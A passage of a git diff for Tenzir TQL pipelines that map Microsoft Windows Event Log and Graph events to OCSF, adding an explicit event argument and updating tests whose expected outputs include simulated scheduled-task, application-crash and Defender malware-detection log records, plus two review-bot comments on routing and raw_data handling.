supported Microsoft events to OCSF. +args: + named: + - name: event + description: The field that holds the Microsoft event to map. + type: field --- -if @name == "microsoft.windows.eventlog" or System? != null { - microsoft::windows::ocsf::map +if $event.System? != null { + microsoft::windows::ocsf::map event=$event } else { - microsoft::graph::ocsf::map + microsoft::graph::ocsf::map event=$event } diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index ef62c4b..0014aeb 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql 
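Review bot: The dispatch in microsoft/operators/ocsf/map.tql now keys solely on `$event.System? != null`, whereas the removed condition also accepted `@name == "microsoft.windows.eventlog"`, so a Windows event whose `System` field was dropped or renamed upstream falls through to the Graph mapper, and a Graph payload that happens to carry a top-level `System` key is routed to the Windows mapper, where `windows.System.EventID.string()` is evaluated. Either way the event is mis-mapped or fails rather than routed correctly, which for a security pipeline means lost telemetry. If `@name` is no longer meaningful once the event lives in a sub-field, the routing rule should be recorded in the description, e.g. `description: Maps supported Microsoft events to OCSF. Routes by the presence of a top-level System field (Windows Event Log) and otherwise assumes a Microsoft Graph event.`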
@@ -1,8 +1,14 @@ --- description: Structured Microsoft Windows Event Log → OCSF +args: + named: + - name: event + description: The field that holds the structured Windows event to map. + type: field --- -this = {windows: this, ocsf: {}} +windows = $event +ocsf = {} ocsf.metadata = { event_code: windows.System.EventID.string(), @@ -139,4 +145,5 @@ match windows.System.EventID { } drop windows.System.EventID -this = {...ocsf, unmapped: windows} +$event = {...ocsf, unmapped: windows} +drop windows, ocsf diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index 68698dc..1786139 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::asim::map +event = this +microsoft::asim::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index 11e19d8..1dd292b 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -30,5 +30,7 @@ from { ip: 10.0.0.1, }, } -microsoft::asim::map +event = this +microsoft::asim::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql index 64b9b0a..93c9845 100644 --- a/microsoft/tests/asim/ocsf/account_change.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -77,6 +77,8 @@ from { } @name = "ocsf.account_change" where class_uid == 3001 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql index 056ddfc..092e691 100644 --- a/microsoft/tests/asim/ocsf/authentication.tql +++ b/microsoft/tests/asim/ocsf/authentication.tql 
@@ -143,6 +143,8 @@ from { }, } @name = "ocsf.authentication" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/detection_finding.tql b/microsoft/tests/asim/ocsf/detection_finding.tql index a63ba80..ea4bd97 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.tql +++ b/microsoft/tests/asim/ocsf/detection_finding.tql @@ -51,5 +51,7 @@ from { ], } @name = "ocsf.detection_finding" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index c1e5d1f..ab5dce3 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4004 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index 2f140d1..aaebb7e 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4003 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/event_log_activity.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql index af795f7..e96d16e 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.tql +++ b/microsoft/tests/asim/ocsf/event_log_activity.tql @@ -39,5 +39,7 @@ from { }, } @name = "ocsf.event_log_activity" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name 
diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index 71badea..2fdaa6b 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 1001 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql index e80f66c..2290440 100644 --- a/microsoft/tests/asim/ocsf/group_management.tql +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -77,6 +77,8 @@ from { } @name = "ocsf.group_management" where class_uid == 3006 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalType diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql index 03d4dce..0aad2b6 100644 --- a/microsoft/tests/asim/ocsf/http_activity.tql +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -183,6 +183,8 @@ from { }, } where class_uid == 4002 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/map.tql b/microsoft/tests/asim/ocsf/map.tql index 391f957..951d4c7 100644 --- a/microsoft/tests/asim/ocsf/map.tql +++ b/microsoft/tests/asim/ocsf/map.tql @@ -26,5 +26,6 @@ from { } @name = "ocsf.script_activity" strict { - microsoft::asim::ocsf::map + event = this + microsoft::asim::ocsf::map event=event } diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql index fcd58a4..7464df1 100644 --- a/microsoft/tests/asim/ocsf/network_activity.tql +++ b/microsoft/tests/asim/ocsf/network_activity.tql 
@@ -183,6 +183,8 @@ from { }, } where class_uid == 4001 -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/process_activity.tql b/microsoft/tests/asim/ocsf/process_activity.tql index 0758530..f274b93 100644 --- a/microsoft/tests/asim/ocsf/process_activity.tql +++ b/microsoft/tests/asim/ocsf/process_activity.tql @@ -55,5 +55,7 @@ from { }, } @name = "ocsf.process_activity" -microsoft::asim::ocsf::map +event = this +microsoft::asim::ocsf::map event=event +this = event name = @name diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index 9c85c19..cd97789 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/eid-4624.xml" { read_all } this = data.parse_winlog() -microsoft::asim::map +event = this +microsoft::asim::map event=event +this = event name = @name drop AdditionalFields.metadata.processed_time? diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql index eda2e63..0458603 100644 --- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql +++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index b597953..1c11eb4 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql +++ b/microsoft/tests/graph/ocsf/defender-alerts.tql 
@@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index d6ff2e3..47eeb98 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index ef02388..30f8d42 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 973eafc..729d082 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql @@ -2,7 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" { read_json } @name = "microsoft.graph.directory_audit" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast sort time diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql index 1524afe..db70247 100644 --- a/microsoft/tests/graph/ocsf/managed-devices.tql 
+++ b/microsoft/tests/graph/ocsf/managed-devices.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" { read_json } @name = "microsoft.graph.intune.managed_device" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql index 5fc5d4e..70bfa49 100644 --- a/microsoft/tests/graph/ocsf/risk-detections.tql +++ b/microsoft/tests/graph/ocsf/risk-detections.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risk_detection" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql index 8d9ac02..f032774 100644 --- a/microsoft/tests/graph/ocsf/risky-users.tql +++ b/microsoft/tests/graph/ocsf/risky-users.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risky_user" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql index 2c86d79..c826a17 100644 --- a/microsoft/tests/graph/ocsf/sign-ins.tql +++ b/microsoft/tests/graph/ocsf/sign-ins.tql @@ -2,6 +2,8 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::ocsf::map +event = this +microsoft::ocsf::map event=event +this = event ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0100.tql b/microsoft/tests/ocsf/eid-0100.tql index ba407bd..839bd50 100644 --- a/microsoft/tests/ocsf/eid-0100.tql +++ b/microsoft/tests/ocsf/eid-0100.tql 
@@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0100.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0100.txt b/microsoft/tests/ocsf/eid-0100.txt index dd0e623..cdd4ffe 100644 --- a/microsoft/tests/ocsf/eid-0100.txt +++ b/microsoft/tests/ocsf/eid-0100.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 100\n 0\n 4\n 0\n 0x8000000000000000\n \n 30100\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n NT AUTHORITY\\SYSTEM\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n \n\n", + raw_data_size: 871, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0101.tql b/microsoft/tests/ocsf/eid-0101.tql index a8a0536..2065428 100644 --- a/microsoft/tests/ocsf/eid-0101.tql +++ b/microsoft/tests/ocsf/eid-0101.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0101.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0101.txt b/microsoft/tests/ocsf/eid-0101.txt index 2deee87..2969cf5 100644 --- a/microsoft/tests/ocsf/eid-0101.txt +++ b/microsoft/tests/ocsf/eid-0101.txt 
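Review bot: `win.raw_data = move data` and `win.raw_data_size = win.raw_data.length_bytes()` are attached by the test after `microsoft::windows::ocsf::map event=win` returns, not by the mapper, so a production pipeline that calls the mapper will not carry the original XML unless it repeats these lines; the mapper only receives the parsed `win` field and cannot do this itself. If retaining `raw_data` is part of the intended OCSF output, that step belongs in a documented caller recipe or a shared operator rather than in each test. The same four lines are copied into every eid-*.tql test in this diff (eid-0101 through eid-1116).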
@@ -34,6 +34,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 101\n 0\n 2\n 0\n 0x8000000000000000\n \n 30101\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {1A2B3C4D-5E6F-7A8B-9C0D-1E2F3A4B5C6D}\n -2147024894\n \n\n", + raw_data_size: 862, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-0102.tql b/microsoft/tests/ocsf/eid-0102.tql index d970c62..1a792a4 100644 --- a/microsoft/tests/ocsf/eid-0102.tql +++ b/microsoft/tests/ocsf/eid-0102.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0102.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0102.txt b/microsoft/tests/ocsf/eid-0102.txt index d3d0576..86b457d 100644 --- a/microsoft/tests/ocsf/eid-0102.txt +++ b/microsoft/tests/ocsf/eid-0102.txt @@ -34,6 +34,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 102\n 0\n 4\n 0\n 0x8000000000000000\n \n 30102\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 0\n \n\n", + raw_data_size: 852, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-0106.tql b/microsoft/tests/ocsf/eid-0106.tql index 88bba1f..7bcbab0 100644 --- a/microsoft/tests/ocsf/eid-0106.tql +++ b/microsoft/tests/ocsf/eid-0106.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0106.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast 
diff --git a/microsoft/tests/ocsf/eid-0106.txt b/microsoft/tests/ocsf/eid-0106.txt index fd47aad..aa76ea2 100644 --- a/microsoft/tests/ocsf/eid-0106.txt +++ b/microsoft/tests/ocsf/eid-0106.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 106\n 0\n 4\n 0\n 0x8000000000000000\n \n 30106\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", + raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0129.tql b/microsoft/tests/ocsf/eid-0129.tql index aef6b70..b4f59f8 100644 --- a/microsoft/tests/ocsf/eid-0129.tql +++ b/microsoft/tests/ocsf/eid-0129.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0129.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0129.txt b/microsoft/tests/ocsf/eid-0129.txt index ed2b6bf..485399c 100644 --- a/microsoft/tests/ocsf/eid-0129.txt +++ b/microsoft/tests/ocsf/eid-0129.txt @@ -39,6 +39,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 129\n 0\n 4\n 0\n 0x8000000000000000\n \n 30129\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n 6812\n \n\n", + raw_data_size: 854, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0140.tql b/microsoft/tests/ocsf/eid-0140.tql index d3b1e42..4293d2a 100644 --- a/microsoft/tests/ocsf/eid-0140.tql +++ b/microsoft/tests/ocsf/eid-0140.tql 
@@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0140.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0140.txt b/microsoft/tests/ocsf/eid-0140.txt index 85c9ca3..1dca283 100644 --- a/microsoft/tests/ocsf/eid-0140.txt +++ b/microsoft/tests/ocsf/eid-0140.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 140\n 0\n 4\n 0\n 0x8000000000000000\n \n 30140\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", + raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0141.tql b/microsoft/tests/ocsf/eid-0141.tql index 74937b5..066eaad 100644 --- a/microsoft/tests/ocsf/eid-0141.tql +++ b/microsoft/tests/ocsf/eid-0141.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0141.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0141.txt b/microsoft/tests/ocsf/eid-0141.txt index f84c9fb..ea7c9e9 100644 --- a/microsoft/tests/ocsf/eid-0141.txt +++ b/microsoft/tests/ocsf/eid-0141.txt @@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 141\n 0\n 4\n 0\n 0x8000000000000000\n \n 30141\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n CORP\\jdoe\n \n\n", + raw_data_size: 787, severity: "Informational", severity_id: 1, time: 2024-03-23T12:35:01Z, 
diff --git a/microsoft/tests/ocsf/eid-0200.tql b/microsoft/tests/ocsf/eid-0200.tql index d4fe04f..a79c239 100644 --- a/microsoft/tests/ocsf/eid-0200.tql +++ b/microsoft/tests/ocsf/eid-0200.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0200.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0200.txt b/microsoft/tests/ocsf/eid-0200.txt index cd37b92..7410aea 100644 --- a/microsoft/tests/ocsf/eid-0200.txt +++ b/microsoft/tests/ocsf/eid-0200.txt @@ -45,6 +45,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 200\n 0\n 4\n 0\n 0x8000000000000000\n \n 30200\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 1032\n \n\n", + raw_data_size: 912, severity: "Informational", severity_id: 1, time: 2024-03-23T12:34:56.789012300Z, diff --git a/microsoft/tests/ocsf/eid-0201.tql b/microsoft/tests/ocsf/eid-0201.tql index 4433671..d151ad7 100644 --- a/microsoft/tests/ocsf/eid-0201.tql +++ b/microsoft/tests/ocsf/eid-0201.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-0201.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-0201.txt b/microsoft/tests/ocsf/eid-0201.txt index 49c8184..3d16e3a 100644 --- a/microsoft/tests/ocsf/eid-0201.txt +++ b/microsoft/tests/ocsf/eid-0201.txt 
@@ -40,6 +40,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 201\n 0\n 4\n 0\n 0x8000000000000000\n \n 30201\n \n \n Microsoft-Windows-TaskScheduler/Operational\n WINHOST01.corp.local\n \n \n \\Microsoft\\Windows\\UpdateOrchestrator\\payload_persist\n {EC84F653-CA0D-4CD0-828E-FDE7D609F86C}\n C:\\tmp\\payload.exe\n 0\n \n\n", + raw_data_size: 910, severity: "Informational", severity_id: 1, status: "Success", diff --git a/microsoft/tests/ocsf/eid-1000.tql b/microsoft/tests/ocsf/eid-1000.tql index 60543e4..37e625b 100644 --- a/microsoft/tests/ocsf/eid-1000.tql +++ b/microsoft/tests/ocsf/eid-1000.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1000.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1000.txt b/microsoft/tests/ocsf/eid-1000.txt index e83a5ed..c4f9336 100644 --- a/microsoft/tests/ocsf/eid-1000.txt +++ b/microsoft/tests/ocsf/eid-1000.txt @@ -43,6 +43,8 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, + raw_data: "\n \n \n 1000\n 0\n 2\n 100\n 0x80000000000000\n \n 8001\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n payload.exe\n 0.0.0.0\n 67df1234\n c0000005\n 000000000000a3f0\n 0x1a4c\n 01da7c3f0b9a1234\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n \n\n", + raw_data_size: 1161, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1001.tql b/microsoft/tests/ocsf/eid-1001.tql index 5ed23f8..362ea70 100644 --- a/microsoft/tests/ocsf/eid-1001.tql +++ b/microsoft/tests/ocsf/eid-1001.tql 
@@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1001.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1001.txt b/microsoft/tests/ocsf/eid-1001.txt index 5f1ea88..b826ac0 100644 --- a/microsoft/tests/ocsf/eid-1001.txt +++ b/microsoft/tests/ocsf/eid-1001.txt @@ -42,6 +42,8 @@ name: "payload.exe", path: "C:\\tmp\\payload.exe", }, + raw_data: "\n \n \n 1001\n 0\n 4\n 0\n 0x80000000000000\n \n 8002\n \n \n Application\n WINHOST01.corp.local\n \n \n 1234567890\n APPCRASH\n Not available\n 0\n payload.exe\n 0.0.0.0\n payload.exe\n 0.0.0.0\n c0000005\n 000000000000a3f0\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n C:\\tmp\\payload.exe\n \n\n", + raw_data_size: 1159, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1002.tql b/microsoft/tests/ocsf/eid-1002.tql index 7e62840..77446f9 100644 --- a/microsoft/tests/ocsf/eid-1002.tql +++ b/microsoft/tests/ocsf/eid-1002.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1002.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1002.txt b/microsoft/tests/ocsf/eid-1002.txt index 616c0dd..0c8a4f7 100644 --- a/microsoft/tests/ocsf/eid-1002.txt +++ b/microsoft/tests/ocsf/eid-1002.txt 
@@ -43,6 +43,8 @@ path: "C:\\tmp\\payload.exe", pid: 6732, }, + raw_data: "\n \n \n 1002\n 0\n 2\n 101\n 0x80000000000000\n \n 8003\n \n \n Application\n WINHOST01.corp.local\n \n \n payload.exe\n 0.0.0.0\n 67df1234\n 0x1a4c\n 01da7c3f0b9a1234\n 60000\n 4\n f87a1b2c-3d4e-5f6a-7b8c-9d0e1f2a3b4c\n C:\\tmp\\payload.exe\n \n\n", + raw_data_size: 966, severity: "Medium", severity_id: 3, status: "Failure", diff --git a/microsoft/tests/ocsf/eid-1006.tql b/microsoft/tests/ocsf/eid-1006.tql index fb37b06..25a1702 100644 --- a/microsoft/tests/ocsf/eid-1006.tql +++ b/microsoft/tests/ocsf/eid-1006.tql @@ -1,8 +1,11 @@ from_file f"{env("TENZIR_INPUTS")}/eid-1006.xml" { read_all } -this = data.parse_winlog() -microsoft::windows::ocsf::map +win = data.parse_winlog() +microsoft::windows::ocsf::map event=win +win.raw_data = move data +win.raw_data_size = win.raw_data.length_bytes() +this = win ocsf::derive ocsf::cast diff --git a/microsoft/tests/ocsf/eid-1006.txt b/microsoft/tests/ocsf/eid-1006.txt index 81eb5db..7829bd6 100644 --- a/microsoft/tests/ocsf/eid-1006.txt +++ b/microsoft/tests/ocsf/eid-1006.txt @@ -70,6 +70,8 @@ ], version: "1.8.0", }, + raw_data: "\n \n \n 1006\n 0\n 3\n 0\n 0x8000000000000000\n \n 41006\n \n \n Microsoft-Windows-Windows Defender/Operational\n WINHOST01.corp.local\n \n \n Trojan:Win32/Meterpreter.A!MSR\n 2147735503\n Severe\n Trojan\n C:\\tmp\\payload.exe\n Local machine\n Concrete\n Real-time Protection\n CORP\\jdoe\n C:\\tmp\\payload.exe\n 1.405.12.0\n 1.1.24010.10\n \n\n", + raw_data_size: 1271, severity: "Critical", severity_id: 5, time: 2024-03-23T12:34:56.789012300Z, diff --git 